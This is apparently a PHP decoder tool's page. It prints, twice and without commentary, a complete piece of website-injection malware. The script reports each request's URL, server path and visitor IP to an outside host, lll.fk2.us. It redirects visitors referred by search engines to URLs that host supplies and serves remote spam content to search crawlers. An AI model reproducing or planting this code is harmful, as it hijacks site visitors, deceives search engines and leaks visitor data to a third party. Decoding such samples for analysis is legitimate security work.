Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $Cdd = ""; $c14 = "http://lll.fk2.us/bmw.php"; header("Content-Type:text/html;ch..

Decoded Output download

<?php  
$Cdd = ""; 
$c14 = "http://lll.fk2.us/bmw.php"; 
header("Content-Type:text/html;charset=utf-8"); 
@ob_start(); 
@set_time_limit(3600); 
if (version_compare(PHP_VERSION, "5.1.0", "<")) { 
	@ini_set("date.timezone", "America/Toronto"); 
} else { 
	@date_default_timezone_set("America/Toronto"); 
} 
D31($c14, $Cdd); 
function D63() { 
	if (isset($_SERVER["HTTP_CLIENT_IP"]) && strcasecmp($_SERVER["HTTP_CLIENT_IP"], "unknown")) { 
		$edd = $_SERVER["HTTP_CLIENT_IP"]; 
	} else { 
		if (isset($_SERVER["HTTP_X_FORWARDED_FOR"]) && strcasecmp($_SERVER["HTTP_X_FORWARDED_FOR"], "unknown")) { 
			$edd = $_SERVER 
			["HTTP_X_FORWARDED_FOR"]; 
		} else { 
			if (isset($_SERVER["REMOTE_ADDR"]) && strcasecmp($_SERVER["REMOTE_ADDR"], "unknown")) { 
				$edd = $_SERVER["REMOTE_ADDR"]; 
			} else { 
				if (isset($_SERVER["REMOTE_ADDR"]) && $_SERVER["REMOTE_ADDR"] && strcasecmp($_SERVER["REMOTE_ADDR"], "unknown")) { 
					$edd = $_SERVER["REMOTE_ADDR"]; 
				} else { 
					$edd = "unknown"; 
				} 
			} 
		} 
	} 
	return $edd; 
} 
function f1A($Eb9) { 
	if (@ini_get("allow_url_fopen")) { 
		return file_get_contents($Eb9); 
	} 
	$a45 = curl_init 
	(); 
	curl_setopt($a45, CURLOPT_URL, $Eb9); 
	curl_setopt($a45, CURLOPT_RETURNTRANSFER, 1); 
	curl_setopt($a45, CURLOPT_FOLLOWLOCATION, 1); 
	curl_setopt($a45, CURLOPT_SSL_VERIFYPEER, false); 
	curl_setopt($a45, CURLOPT_SSL_VERIFYHOST, 0); 
	$e28 = curl_exec($a45); 
	curl_close($a45); 
	return $e28; 
} 
function D31($c14, $Cdd = '') { 
	$Fc4 = isset($_SERVER["DOCUMENT_ROOT"]) ? str_replace("\", "/", $_SERVER["DOCUMENT_ROOT"]) : ''; 
	$Cf6 = isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : __FILE__; 
	$Cf6 = str_replace("\", "/", $Cf6); 
	$A99 = isset($_SERVER["SCRIPT_NAME"]) ? $_SERVER["SCRIPT_NAME"] : str_replace($Fc4, '', $Cf6); 
	$A99 = $A99 != '' ? substr($A99, 1) : $A99; 
	$Fc4 = preg_replace("/\/\$/si", '', $Fc4); 
	$A99 = strtolower($A99) == "index.php" ? '' : $A99; 
	$Cf6 = $A99 != '' ? substr($A99, 0, strrpos($A99, "/")) : ($Fc4 != '' ? str_replace($Fc4, '', dirname($Cf6)) : ''); 
	$A99 = preg_replace("/.*\/(.*)/si", "\$1", $A99); 
	$A99 = strtolower($A99) == "index.php" ? '' : $A99; 
	$Cf6 = str_replace("\", "/", $Cf6 == '' || $Cf6 == "index.php" ? '' : $Cf6); 
	$C20 = isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : (isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : ''); 
	$C20 = $C20 == '' ? isset($_SERVER["PATH_INFO"]) && $_SERVER["PATH_INFO"] != '' ? $_SERVER["PATH_INFO"] : $C20 : $C20; 
	$D03 = isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $_SERVER["SERVER_NAME"]; 
	$D03 = (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] !== "off" ? "https" : "http") . "://" . $D03; 
	$C19 = "request_url=" . urlencode("{$D03}{$C20}") . "&www_path=" . urlencode($Cf6) . "&client_ip=" . urlencode(D63()) . "&request_php=" . urlencode($A99) . "&request_type=" . urlencode($Cdd); 
	if (isset($_SERVER["HTTP_REFERER"]) && preg_match("/(google|yahoo|yandex|bing|baidu|aol|ask|excite|duckduckgo)/si", $_SERVER["HTTP_REFERER"])) { 
		$Bdf = F1A("{$c14}?redirect=1&{$C19}"); 
		if (preg_match("/^https?\:\/\//si", $Bdf)) { 
			header("Location:" . $Bdf); 
			exit; 
		} else { 
			die($Bdf); 
		} 
	} 
	if (isset($_SERVER["HTTP_USER_AGENT"]) && preg_match("/(googlebot|yahoo|slurp|baiduspider|bingbot|google|baidu|aol|bing)/si", $_SERVER["HTTP_USER_AGENT"])) { 
		die(F1A("{$c14}?redirect=0&{$C19}")); 
	} 
} 
?>

Did this file decode correctly?

Original Code

<?php 
$Cdd = "";
$c14 = "http://lll.fk2.us/bmw.php";
header("Content-Type:text/html;charset=utf-8");
@ob_start();
@set_time_limit(3600);
if (version_compare(PHP_VERSION, "5.1.0", "<")) {
	@ini_set("date.timezone", "America/Toronto");
} else {
	@date_default_timezone_set("America/Toronto");
}
D31($c14, $Cdd);
function D63() {
	if (isset($_SERVER["HTTP_CLIENT_IP"]) && strcasecmp($_SERVER["HTTP_CLIENT_IP"], "unknown")) {
		$edd = $_SERVER["HTTP_CLIENT_IP"];
	} else {
		if (isset($_SERVER["HTTP_X_FORWARDED_FOR"]) && strcasecmp($_SERVER["HTTP_X_FORWARDED_FOR"], "unknown")) {
			$edd = $_SERVER
			["HTTP_X_FORWARDED_FOR"];
		} else {
			if (isset($_SERVER["REMOTE_ADDR"]) && strcasecmp($_SERVER["REMOTE_ADDR"], "unknown")) {
				$edd = $_SERVER["REMOTE_ADDR"];
			} else {
				if (isset($_SERVER["REMOTE_ADDR"]) && $_SERVER["REMOTE_ADDR"] && strcasecmp($_SERVER["REMOTE_ADDR"], "unknown")) {
					$edd = $_SERVER["REMOTE_ADDR"];
				} else {
					$edd = "unknown";
				}
			}
		}
	}
	return $edd;
}
function f1A($Eb9) {
	if (@ini_get("allow_url_fopen")) {
		return file_get_contents($Eb9);
	}
	$a45 = curl_init
	();
	curl_setopt($a45, CURLOPT_URL, $Eb9);
	curl_setopt($a45, CURLOPT_RETURNTRANSFER, 1);
	curl_setopt($a45, CURLOPT_FOLLOWLOCATION, 1);
	curl_setopt($a45, CURLOPT_SSL_VERIFYPEER, false);
	curl_setopt($a45, CURLOPT_SSL_VERIFYHOST, 0);
	$e28 = curl_exec($a45);
	curl_close($a45);
	return $e28;
}
function D31($c14, $Cdd = '') {
	$Fc4 = isset($_SERVER["DOCUMENT_ROOT"]) ? str_replace("\\", "/", $_SERVER["DOCUMENT_ROOT"]) : '';
	$Cf6 = isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : __FILE__;
	$Cf6 = str_replace("\\", "/", $Cf6);
	$A99 = isset($_SERVER["SCRIPT_NAME"]) ? $_SERVER["SCRIPT_NAME"] : str_replace($Fc4, '', $Cf6);
	$A99 = $A99 != '' ? substr($A99, 1) : $A99;
	$Fc4 = preg_replace("/\\/\$/si", '', $Fc4);
	$A99 = strtolower($A99) == "index.php" ? '' : $A99;
	$Cf6 = $A99 != '' ? substr($A99, 0, strrpos($A99, "/")) : ($Fc4 != '' ? str_replace($Fc4, '', dirname($Cf6)) : '');
	$A99 = preg_replace("/.*\\/(.*)/si", "\$1", $A99);
	$A99 = strtolower($A99) == "index.php" ? '' : $A99;
	$Cf6 = str_replace("\\", "/", $Cf6 == '' || $Cf6 == "index.php" ? '' : $Cf6);
	$C20 = isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : (isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : '');
	$C20 = $C20 == '' ? isset($_SERVER["PATH_INFO"]) && $_SERVER["PATH_INFO"] != '' ? $_SERVER["PATH_INFO"] : $C20 : $C20;
	$D03 = isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $_SERVER["SERVER_NAME"];
	$D03 = (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] !== "off" ? "https" : "http") . "://" . $D03;
	$C19 = "request_url=" . urlencode("{$D03}{$C20}") . "&www_path=" . urlencode($Cf6) . "&client_ip=" . urlencode(D63()) . "&request_php=" . urlencode($A99) . "&request_type=" . urlencode($Cdd);
	if (isset($_SERVER["HTTP_REFERER"]) && preg_match("/(google|yahoo|yandex|bing|baidu|aol|ask|excite|duckduckgo)/si", $_SERVER["HTTP_REFERER"])) {
		$Bdf = F1A("{$c14}?redirect=1&{$C19}");
		if (preg_match("/^https?\\:\\/\\//si", $Bdf)) {
			header("Location:" . $Bdf);
			exit;
		} else {
			die($Bdf);
		}
	}
	if (isset($_SERVER["HTTP_USER_AGENT"]) && preg_match("/(googlebot|yahoo|slurp|baiduspider|bingbot|google|baidu|aol|bing)/si", $_SERVER["HTTP_USER_AGENT"])) {
		die(F1A("{$c14}?redirect=0&{$C19}"));
	}
}
?>

Function Calls

header 1

Variables

$Cdd
$c14 http://lll.fk2.us/bmw.php

Stats

MD5 3ce380f25c7c80f2e93139efd72fa298
Eval Count 0
Decode Time 98 ms